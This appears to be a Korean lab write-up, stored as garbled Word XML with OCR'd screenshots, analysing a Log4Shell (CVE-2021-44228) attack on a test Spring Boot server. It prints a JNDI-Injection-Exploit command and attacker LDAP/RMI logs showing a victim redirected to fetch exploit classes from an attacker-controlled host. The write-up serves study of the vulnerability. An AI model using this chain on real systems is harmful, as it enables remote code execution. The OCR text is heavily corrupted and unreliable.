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Log4j (CVE-2021-44228) Log4shell 공격 분석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취약하지 않은 서버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descr="Mapp # &#10;24 [ &#10;24 [ &#10;.56. 975 &#10;c. &#10;24 [ &#10;24 [ &#10;335 &#10;a. &#10;24 [ &#10;01:39:58. 335 &#10;a. &#10;24 [ &#10;01:39. &#10;.58. 421 &#10;a. &#10;24 [ &#10;422 &#10;030 &#10;24 - &#10;24 [ &#10;042 &#10;c. &#10;a. &#10;24 - &#10;s. &#10;s. &#10;. a ache. 10 in &#10;—jar &#10;Spring Boot . &#10;spring—boot—application. jar &#10;(v2.6.1) &#10;2021-12-21 01:39:56. 965 &#10;INFO &#10;1 on 7460564dd1de with PID 24 &#10;main] f.c.1.v.Vu1nerab1eAppApp1ication &#10;( / app/ spring—boot—application.jar started by root in / app) &#10;2021-12-21 01:39. &#10;es: default &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;in 1298 &#10;ms &#10;2021-12-21 &#10;ath &#10;2021-12-21 &#10;running for 4.021) &#10;2021-12-21 559 &#10;let I &#10;2021-12-21 560 &#10;2021-12-21 562 &#10;2021-12-21 &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;main] &#10;main] &#10;main] &#10;main] &#10;main] &#10;main] &#10;main] &#10;main] &#10;o &#10;o &#10;w &#10;f &#10;o &#10;o &#10;o &#10;f. I.V. VulnerableAppApp1ication &#10;O.S.b.w.e.t.TomcatWebServer &#10;. c.c. StandardService &#10;. c.c. StandardEngine &#10;. .c.Serv1etWebServerApp1icationContext &#10;s &#10;24 &#10;24 &#10;O.S.b.w.e.t.TomcatWebServer &#10;. 1. v . VulnerableAppApp1ication &#10;. w. s. DispatcherServIet &#10;. w. s. DispatcherServ1et &#10;Starting VulnerableAppApp1ication using Java 1.8.e_18 &#10;No active profile set, falling back to default profil &#10;Tomcat initialized with port(s): 8080 (http) &#10;Starting service [Tomcat] &#10;Starting Servlet engine: [Apache Tomcat/ 9.0.55] &#10;Initializing Spring embedded WebAppIicationContext &#10;Root WebApp1icationContext: initialization completed &#10;Tomcat started on port(s): 8080 (http) with context p &#10;Started VulnerableAppApp1ication in 2.74 seconds (JVM &#10;Initializing Spring DispatcherServ1et 'dispatcherServ &#10;Initializing Servlet 'dispatcherServIetI &#10;Completed initialization in 2 ms &#10;637 http—nio—808e—exec—1 WARN Error looking up JNDI resource [rmi://192. &#10;ption [Root exception is java.rmi.ConnectException: Connection refused to host: 192.168.186.2; nested exception is: &#10;javax naming . ServiceUnavai1ab1eExce &#10;168.186.2:1099/yeok8u]. &#10;java. net. ConnectException: Connection refused (Connection refused)] &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;com . sun . j ndi . rmi . registry . RegistryContext . lookup ( RegistryContext . j ava : 136 ) &#10;com.sun.jndi.toolkit . url. GenericURLContext . lookup ( GenericURLContext . j ava : 205 ) &#10;j avax . naming . InitialContext . lookup ( InitialContext . j ava : 417 ) &#10;org . apache. logging . log4j . &#10;org . apache. logging. log4j . &#10;org . apache. logging . log4j • &#10;org . apache. logging . log4j . &#10;org . apache. logging. log4j . &#10;org . apache. logging . log4j • &#10;org . apache. logging . log4j . &#10;org . apache. logging. log4j . &#10;or &#10;.10 4 &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;. core. &#10;net . JndiManager . lookup ( JndiManager . java : 172) &#10;lookup . JndiLookup. lookup (JndiLookup. java : 56) &#10;lookup . Interpolator . lookup( Interpolator . java : 221) &#10;lookup . StrSubstitutor . resolveVariab1e ( StrSubstitutor . j ava : 1110 ) &#10;lookup . StrSubstitutor . substitute ( StrSubstitutor. java : 1033) &#10;lookup . StrSubstitutor . substitute (StrSubstitutor. java : 912) &#10;lookup . StrSubstitutor . replace (StrSubstitutor. java : 467 ) &#10;pattern . MessagePatternConverter. format (MessagePatternConverter. j ava : 132 ) &#10;at tern. PatternFormatter.format PatternFormatter. •ava:38 " id="5" name="image3.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="Mapp # &#10;24 [ &#10;24 [ &#10;.56. 975 &#10;c. &#10;24 [ &#10;24 [ &#10;335 &#10;a. &#10;24 [ &#10;01:39:58. 335 &#10;a. &#10;24 [ &#10;01:39. &#10;.58. 421 &#10;a. &#10;24 [ &#10;422 &#10;030 &#10;24 - &#10;24 [ &#10;042 &#10;c. &#10;a. &#10;24 - &#10;s. &#10;s. &#10;. a ache. 10 in &#10;—jar &#10;Spring Boot . &#10;spring—boot—application. jar &#10;(v2.6.1) &#10;2021-12-21 01:39:56. 965 &#10;INFO &#10;1 on 7460564dd1de with PID 24 &#10;main] f.c.1.v.Vu1nerab1eAppApp1ication &#10;( / app/ spring—boot—application.jar started by root in / app) &#10;2021-12-21 01:39. &#10;es: default &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;in 1298 &#10;ms &#10;2021-12-21 &#10;ath &#10;2021-12-21 &#10;running for 4.021) &#10;2021-12-21 559 &#10;let I &#10;2021-12-21 560 &#10;2021-12-21 562 &#10;2021-12-21 &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;INFO &#10;main] &#10;main] &#10;main] &#10;main] &#10;main] &#10;main] &#10;main] &#10;main] &#10;o &#10;o &#10;w &#10;f &#10;o &#10;o &#10;o &#10;f. I.V. VulnerableAppApp1ication &#10;O.S.b.w.e.t.TomcatWebServer &#10;. c.c. StandardService &#10;. c.c. StandardEngine &#10;. .c.Serv1etWebServerApp1icationContext &#10;s &#10;24 &#10;24 &#10;O.S.b.w.e.t.TomcatWebServer &#10;. 1. v . VulnerableAppApp1ication &#10;. w. s. DispatcherServIet &#10;. w. s. DispatcherServ1et &#10;Starting VulnerableAppApp1ication using Java 1.8.e_18 &#10;No active profile set, falling back to default profil &#10;Tomcat initialized with port(s): 8080 (http) &#10;Starting service [Tomcat] &#10;Starting Servlet engine: [Apache Tomcat/ 9.0.55] &#10;Initializing Spring embedded WebAppIicationContext &#10;Root WebApp1icationContext: initialization completed &#10;Tomcat started on port(s): 8080 (http) with context p &#10;Started VulnerableAppApp1ication in 2.74 seconds (JVM &#10;Initializing Spring DispatcherServ1et 'dispatcherServ &#10;Initializing Servlet 'dispatcherServIetI &#10;Completed initialization in 2 ms &#10;637 http—nio—808e—exec—1 WARN Error looking up JNDI resource [rmi://192. &#10;ption [Root exception is java.rmi.ConnectException: Connection refused to host: 192.168.186.2; nested exception is: &#10;javax naming . ServiceUnavai1ab1eExce &#10;168.186.2:1099/yeok8u]. &#10;java. net. ConnectException: Connection refused (Connection refused)] &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;com . sun . j ndi . rmi . registry . RegistryContext . lookup ( RegistryContext . j ava : 136 ) &#10;com.sun.jndi.toolkit . url. GenericURLContext . lookup ( GenericURLContext . j ava : 205 ) &#10;j avax . naming . InitialContext . lookup ( InitialContext . j ava : 417 ) &#10;org . apache. logging . log4j . &#10;org . apache. logging. log4j . &#10;org . apache. logging . log4j • &#10;org . apache. logging . log4j . &#10;org . apache. logging. log4j . &#10;org . apache. logging . log4j • &#10;org . apache. logging . log4j . &#10;org . apache. logging. log4j . &#10;or &#10;.10 4 &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;. core. &#10;net . JndiManager . lookup ( JndiManager . java : 172) &#10;lookup . JndiLookup. lookup (JndiLookup. java : 56) &#10;lookup . Interpolator . lookup( Interpolator . java : 221) &#10;lookup . StrSubstitutor . resolveVariab1e ( StrSubstitutor . j ava : 1110 ) &#10;lookup . StrSubstitutor . substitute ( StrSubstitutor. java : 1033) &#10;lookup . StrSubstitutor . substitute (StrSubstitutor. java : 912) &#10;lookup . StrSubstitutor . replace (StrSubstitutor. java : 467 ) &#10;pattern . MessagePatternConverter. format (MessagePatternConverter. j ava : 132 ) &#10;at tern. PatternFormatter.format PatternFormatter. •ava:38 "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취약한 서버</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000000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2971800"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="2021-12-21 01:44:16, 121 http-nio-8080-exec-9 WARN Error looking up JNDI resource &#10;javax.naming.NamingException: prob &#10;lem generating object using object factory [Root exception is java. lang. ClassCastException: Exec TemplateJDK8 cannot be cast to javax.naming.spi.ObjectF &#10;actory]; remaining name '39nd20' &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;com. sun . jndi. Idap. LdapCtx . c _ lookup( LdapCtx. java : 1092) &#10;com. sun . jndi . toolkit . ctx . ComponentContext . p _ lookup ( ComponentContext . j ava : 542) &#10;com. sun . jndi . toolkit . ctx . PartialCompositeContext . lookup (PartialCompositeContext . j ava : 177) &#10;com. sun . jndi . toolkit . url . GenericURLContext . lookup ( GenericURLContext . j ava : 205) &#10;com. sun . jndi . url . Idap. IdapURLContext . lookup(IdapURLContext . java : 94) &#10;javax . naming . InitialContext . lookup (InitialContext . java : 417)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• &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;net . JndiManager. lookup(JndiManager . java : 172) &#10;lookup. JndiLookup . lookup(JndiLookup . java : 56) &#10;lookup. Interpolator . lookup( Interpolator. java : 221) &#10;lookup . StrSubstitutor. resolveVariab1e (StrSubstitutor . java : 1110 ) &#10;lookup . StrSubstitutor. substitute ( StrSubstitutor . j ava : 1033 ) &#10;lookup . StrSubstitutor. substitute (StrSubstitutor . j ava : 912) &#10;lookup . StrSubstitutor. replace ( StrSubstitutor . java : 467) &#10;pattern . MessagePatternConverter. format (MessagePatternConverter. j ava : 132 ) &#10;pattern . PatternFormatter. format (PatternFormatter. j ava : 38) &#10;layout . PatternLayout$PatternSeria1izer . toSeria1izab1e ( PatternLayout . java : 344) &#10;layout . PatternLayout . to Text (PatternLayout . java : 244) &#10;layout . PatternLayout . encode (PatternLayout . java : 229) &#10;layout . PatternLayout . encode (PatternLayout . java : 59) &#10;appender . AbstractOutputStreamAppender . directEncodeEvent (AbstractOutputStreamAppender. j ava : 197 ) &#10;appender . AbstractOutputStreamAppender . tryAppend (AbstractOutputStreamAppender . java : 190) &#10;appender . AbstractOutputStreamAppender . append (AbstractOutputStreamAppender . java : 181) &#10;config . AppenderControI. tryCaIIAppender (AppenderControI. j ava : 156 ) &#10;config . AppenderContr01. callAppender0 (AppenderContr01. java : 129) &#10;config . AppenderContr01. callAppenderPreventRecursion (AppenderContr01. java : 120) &#10;config . AppenderControI. callAppender (AppenderControI. j ava : 84) &#10;config . LoggerConfig . callAppenders ( LoggerConfig . java : 540) &#10;config . LoggerConfig . processLogEvent( LoggerConfig . java : 498) &#10;config . LoggerConfig . log ( LoggerConfig. java : 481) &#10;config . LoggerConfig . log ( LoggerConfig . java : 456) &#10;config . AwaitComp1etionRe1iabi1ityStrategy . log (AwaitComp1etionRe1iabi1ityStrategy . j ava : 82) &#10;Logger. log (Logger. java : 161) &#10;spi . AbstractLogger . tryLogMessage (AbstractLogger. java : 2205) &#10;spi . AbstractLogger . logMessageTrackRecursion (AbstractLogger . j ava : 2159 ) &#10;spi . Abstract Logger . logMessageSa fely (Abstract Logger. java : 2142) &#10;spi . AbstractLogger . logMessage (AbstractLogger. java : 2017) " id="6" name="image6.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="2021-12-21 01:44:16, 121 http-nio-8080-exec-9 WARN Error looking up JNDI resource &#10;javax.naming.NamingException: prob &#10;lem generating object using object factory [Root exception is java. lang. ClassCastException: Exec TemplateJDK8 cannot be cast to javax.naming.spi.ObjectF &#10;actory]; remaining name '39nd20' &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;at &#10;com. sun . jndi. Idap. LdapCtx . c _ lookup( LdapCtx. java : 1092) &#10;com. sun . jndi . toolkit . ctx . ComponentContext . p _ lookup ( ComponentContext . j ava : 542) &#10;com. sun . jndi . toolkit . ctx . PartialCompositeContext . lookup (PartialCompositeContext . j ava : 177) &#10;com. sun . jndi . toolkit . url . GenericURLContext . lookup ( GenericURLContext . j ava : 205) &#10;com. sun . jndi . url . Idap. IdapURLContext . lookup(IdapURLContext . java : 94) &#10;javax . naming . InitialContext . lookup (InitialContext . java : 417)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. &#10;org . apache. logging . log4j • &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;core. &#10;net . JndiManager. lookup(JndiManager . java : 172) &#10;lookup. JndiLookup . lookup(JndiLookup . java : 56) &#10;lookup. Interpolator . lookup( Interpolator. java : 221) &#10;lookup . StrSubstitutor. resolveVariab1e (StrSubstitutor . java : 1110 ) &#10;lookup . StrSubstitutor. substitute ( StrSubstitutor . j ava : 1033 ) &#10;lookup . StrSubstitutor. substitute (StrSubstitutor . j ava : 912) &#10;lookup . StrSubstitutor. replace ( StrSubstitutor . java : 467) &#10;pattern . MessagePatternConverter. format (MessagePatternConverter. j ava : 132 ) &#10;pattern . PatternFormatter. format (PatternFormatter. j ava : 38) &#10;layout . PatternLayout$PatternSeria1izer . toSeria1izab1e ( PatternLayout . java : 344) &#10;layout . PatternLayout . to Text (PatternLayout . java : 244) &#10;layout . PatternLayout . encode (PatternLayout . java : 229) &#10;layout . PatternLayout . encode (PatternLayout . java : 59) &#10;appender . AbstractOutputStreamAppender . directEncodeEvent (AbstractOutputStreamAppender. j ava : 197 ) &#10;appender . AbstractOutputStreamAppender . tryAppend (AbstractOutputStreamAppender . java : 190) &#10;appender . AbstractOutputStreamAppender . append (AbstractOutputStreamAppender . java : 181) &#10;config . AppenderControI. tryCaIIAppender (AppenderControI. j ava : 156 ) &#10;config . AppenderContr01. callAppender0 (AppenderContr01. java : 129) &#10;config . AppenderContr01. callAppenderPreventRecursion (AppenderContr01. java : 120) &#10;config . AppenderControI. callAppender (AppenderControI. j ava : 84) &#10;config . LoggerConfig . callAppenders ( LoggerConfig . java : 540) &#10;config . LoggerConfig . processLogEvent( LoggerConfig . java : 498) &#10;config . LoggerConfig . log ( LoggerConfig. java : 481) &#10;config . LoggerConfig . log ( LoggerConfig . java : 456) &#10;config . AwaitComp1etionRe1iabi1ityStrategy . log (AwaitComp1etionRe1iabi1ityStrategy . j ava : 82) &#10;Logger. log (Logger. java : 161) &#10;spi . AbstractLogger . tryLogMessage (AbstractLogger. java : 2205) &#10;spi . AbstractLogger . logMessageTrackRecursion (AbstractLogger . j ava : 2159 ) &#10;spi . Abstract Logger . logMessageSa fely (Abstract Logger. java : 2142) &#10;spi . AbstractLogger . logMessage (AbstractLogger. java : 2017) "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#########################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공격이 가능한 서버를 타고온</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> log4shell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</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> #########################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000010">
      <w:pPr>
        <w:rPr>
          <w:color w:val="1155cc"/>
          <w:u w:val="single"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">- </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:cs="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">공격이 가능한 서버를 보면</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> LDAP </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:cs="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">찍고</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> -&gt; 8180</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:cs="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">서비스 중인</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> JAVA </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="Malgun Gothic" w:cs="Malgun Gothic" w:eastAsia="Malgun Gothic" w:hAnsi="Malgun Gothic"/>
          <w:color w:val="fa0000"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">서버로 리퀘스트를 날려서 통신이 일어남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1219200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="2021-12-21 &#10;2021-12-21 &#10;10:40. &#10;2021-12-21 &#10;•42:10 &#10;2021-12-21 &#10;•42:10 &#10;2021-12-21 &#10;•43:14 &#10;2021-12-21 &#10;2021-12-21 &#10;44:16 &#10;2021-12-21 &#10;•44:16 &#10;10. &#10;10. &#10;10. &#10;10. &#10;•43. &#10;•44 &#10;•44 &#10;•14 &#10;CLDAPSERVER] &#10;CLDAPSERVER] &#10;[LDAPSERVER] &#10;CLDAPSERVER] &#10;redirecting to http://192.168.186.2:8180/ExecTemp1ateJDK7.c1ass &#10;Send LDAP reference result for yeok8u &#10;Log a request to http://192.168.186.2. &#10;• 8180/ExecTemp1ateJDK7. class &#10;redirecting to http://192.168.186.2:818Ø/ExecTemp1ateJDK8.c1ass &#10;Send LDAP reference result for 39nd20 &#10;Log a request to http://192.168.186.2:8180/ExecTemp1ateJDK8.c1ass &#10;redirecting to http://192.168.186.2:818Ø/ExecTemp1ateJDK7.c1ass &#10;Send LDAP reference result for yeok8u &#10;Log a request to http://192.168.186.2:818Ø/ExecTempIateJDK7.cIass &#10;redirecting to http://192.168.186.2:818Ø/ExecTemp1ateJDK8.c1ass &#10;Send LDAP reference result for 39nd20 &#10;Log a request to http://192.168.186.2:818Ø/ExecTemp1ateJDK8.c1ass " id="4" name="image5.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="2021-12-21 &#10;2021-12-21 &#10;10:40. &#10;2021-12-21 &#10;•42:10 &#10;2021-12-21 &#10;•42:10 &#10;2021-12-21 &#10;•43:14 &#10;2021-12-21 &#10;2021-12-21 &#10;44:16 &#10;2021-12-21 &#10;•44:16 &#10;10. &#10;10. &#10;10. &#10;10. &#10;•43. &#10;•44 &#10;•44 &#10;•14 &#10;CLDAPSERVER] &#10;CLDAPSERVER] &#10;[LDAPSERVER] &#10;CLDAPSERVER] &#10;redirecting to http://192.168.186.2:8180/ExecTemp1ateJDK7.c1ass &#10;Send LDAP reference result for yeok8u &#10;Log a request to http://192.168.186.2. &#10;• 8180/ExecTemp1ateJDK7. class &#10;redirecting to http://192.168.186.2:818Ø/ExecTemp1ateJDK8.c1ass &#10;Send LDAP reference result for 39nd20 &#10;Log a request to http://192.168.186.2:8180/ExecTemp1ateJDK8.c1ass &#10;redirecting to http://192.168.186.2:818Ø/ExecTemp1ateJDK7.c1ass &#10;Send LDAP reference result for yeok8u &#10;Log a request to http://192.168.186.2:818Ø/ExecTempIateJDK7.cIass &#10;redirecting to http://192.168.186.2:818Ø/ExecTemp1ateJDK8.c1ass &#10;Send LDAP reference result for 39nd20 &#10;Log a request to http://192.168.186.2:818Ø/ExecTemp1ateJDK8.c1ass "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#########################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버전이 높은 서버를 타고 들어온</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> log4shell LDAP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서버</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> #########################</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="00000016">
      <w:pPr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lhj@ubuntu:~/hack$ java -jar JNDI-Injection-Exploit-1.0-SNAPSHOT-all.jar -C "touch hacked_by_heonjin" -A 192.168.186.2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2489200"/>
            <wp:effectExtent b="0" l="0" r="0" t="0"/>
            <wp:docPr descr="java —jar &#10;[ADDRESS] 192.168.186.2 &#10;[COMMAND] &#10;touch hacked_by_heonjin &#10;-----JNDI Links-- &#10;Target environment (Build in &#10;whose trustURLCodebase is true) : &#10;JDK 1.7 &#10;rmi:/ /192 .168 .186.2: 1099/yOok8u &#10;Idap: //192 .168.186.2: 1389/yeok8u &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;09:58. &#10;2021-12-21 &#10;2021-12-21 &#10;09:58. &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;—C &quot;touch &#10;-A 192.168.186.2 &#10;Target environment (Build in &#10;whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath): &#10;JDK &#10;rmi:/ /192 .168 .186.2: 1099/omhoj4 &#10;Target environment (Build in &#10;whose trustURLCodebase is true): &#10;JDK 1.8 &#10;rmi:/ /192 .168 .186.2: &#10;• .168.186.2: 1389/39nd20 &#10;Idap. &#10;———————————————————————————Server Log———————————————————————————— &#10;Listening on e.e.o.e:818e &#10;[RMISERVER] Listening on e.e.ø.e:1099 &#10;[LDAPSERVER] Listening on e.e.o.e:1389 &#10;[RMISERVER] Have connection from /172.17.0.2:49668 &#10;[RMISERVER] &gt;&gt; Reading message... &#10;[RMISERVER] Is RM1.100kup call for omhoj4 2 &#10;[RMISERVER] &gt;&gt; Closing connection &#10;09. &#10;09. &#10;09 . &#10;•56: &#10;• 56. &#10;• 56. &#10;09:58:50 &#10;49 &#10;•49 &#10;•51 &#10;•51 &#10;Exception in thread &#10;&quot;Thread—I&quot; java. lang. IllegalAccessError: class jndi.RMIRefServer (in unnamed module @0x3e849b9e) cannot access class com.sun.jndi.r &#10;mi. registry. ReferenceWrapper (in module jdk.naming.rmi) because module jdk.naming.rmi &#10;849b9e &#10;does not export com.sun.jndi.rmi.registry to unnamed module @Ox3e &#10;at &#10;at &#10;at &#10;at &#10;at &#10;j ndi . RMIRefServer. handleRMI (RMIRefServer . java : 343) &#10;jndi . RMIRefServer . doCa11 (RMIRefServer . java : 299) &#10;j ndi . RMIRefServer. doMessage (RMIRefServer . java : 245) &#10;jndi . RMIRefServer. run (RMIRefServer . java : 190) &#10;java . base/ java. lang . Thread. run (Thread . java : 833) &#10;09:59:32 [LDAPSERVER] &gt;&gt; Send LDAP reference result &#10;[LDAPSERVER] Send LDAP reference result &#10;[LDAPSERVER] &gt;&gt; send LDAP reference result &#10;[LDAPSERVER] Send LDAP reference result &#10;for &#10;for &#10;for &#10;for &#10;yeok8u &#10;39nd20 &#10;39nd2e &#10;Ook8u &#10;redirecting &#10;redirecting &#10;redirecting &#10;redirectina &#10;to &#10;to &#10;to &#10;to &#10;• / /192.168.186.2 : 818Ø/ExecTemp1ateJDK7. &#10;http. &#10;•//192.168.186. &#10;2 : 8180/ExecTemp1ateJDK8. &#10;http. &#10;http. &#10;• //192.168.186.2 : 8180/ExecTemp1ateJDK8. &#10;• / /192 .168.186.2: 8180/ExecTemD1ateJDK7. &#10;httD. &#10;class &#10;class &#10;class &#10;class " id="3" name="image1.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr descr="java —jar &#10;[ADDRESS] 192.168.186.2 &#10;[COMMAND] &#10;touch hacked_by_heonjin &#10;-----JNDI Links-- &#10;Target environment (Build in &#10;whose trustURLCodebase is true) : &#10;JDK 1.7 &#10;rmi:/ /192 .168 .186.2: 1099/yOok8u &#10;Idap: //192 .168.186.2: 1389/yeok8u &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;09:58. &#10;2021-12-21 &#10;2021-12-21 &#10;09:58. &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;2021-12-21 &#10;—C &quot;touch &#10;-A 192.168.186.2 &#10;Target environment (Build in &#10;whose trustURLCodebase is false and have Tomcat 8+ or SpringBoot 1.2.x+ in classpath): &#10;JDK &#10;rmi:/ /192 .168 .186.2: 1099/omhoj4 &#10;Target environment (Build in &#10;whose trustURLCodebase is true): &#10;JDK 1.8 &#10;rmi:/ /192 .168 .186.2: &#10;• .168.186.2: 1389/39nd20 &#10;Idap. &#10;———————————————————————————Server Log———————————————————————————— &#10;Listening on e.e.o.e:818e &#10;[RMISERVER] Listening on e.e.ø.e:1099 &#10;[LDAPSERVER] Listening on e.e.o.e:1389 &#10;[RMISERVER] Have connection from /172.17.0.2:49668 &#10;[RMISERVER] &gt;&gt; Reading message... &#10;[RMISERVER] Is RM1.100kup call for omhoj4 2 &#10;[RMISERVER] &gt;&gt; Closing connection &#10;09. &#10;09. &#10;09 . &#10;•56: &#10;• 56. &#10;• 56. &#10;09:58:50 &#10;49 &#10;•49 &#10;•51 &#10;•51 &#10;Exception in thread &#10;&quot;Thread—I&quot; java. lang. IllegalAccessError: class jndi.RMIRefServer (in unnamed module @0x3e849b9e) cannot access class com.sun.jndi.r &#10;mi. registry. ReferenceWrapper (in module jdk.naming.rmi) because module jdk.naming.rmi &#10;849b9e &#10;does not export com.sun.jndi.rmi.registry to unnamed module @Ox3e &#10;at &#10;at &#10;at &#10;at &#10;at &#10;j ndi . RMIRefServer. handleRMI (RMIRefServer . java : 343) &#10;jndi . RMIRefServer . doCa11 (RMIRefServer . java : 299) &#10;j ndi . RMIRefServer. doMessage (RMIRefServer . java : 245) &#10;jndi . RMIRefServer. run (RMIRefServer . java : 190) &#10;java . base/ java. lang . Thread. run (Thread . java : 833) &#10;09:59:32 [LDAPSERVER] &gt;&gt; Send LDAP reference result &#10;[LDAPSERVER] Send LDAP reference result &#10;[LDAPSERVER] &gt;&gt; send LDAP reference result &#10;[LDAPSERVER] Send LDAP reference result &#10;for &#10;for &#10;for &#10;for &#10;yeok8u &#10;39nd20 &#10;39nd2e &#10;Ook8u &#10;redirecting &#10;redirecting &#10;redirecting &#10;redirectina &#10;to &#10;to &#10;to &#10;to &#10;• / /192.168.186.2 : 818Ø/ExecTemp1ateJDK7. &#10;http. &#10;•//192.168.186. &#10;2 : 8180/ExecTemp1ateJDK8. &#10;http. &#10;http. 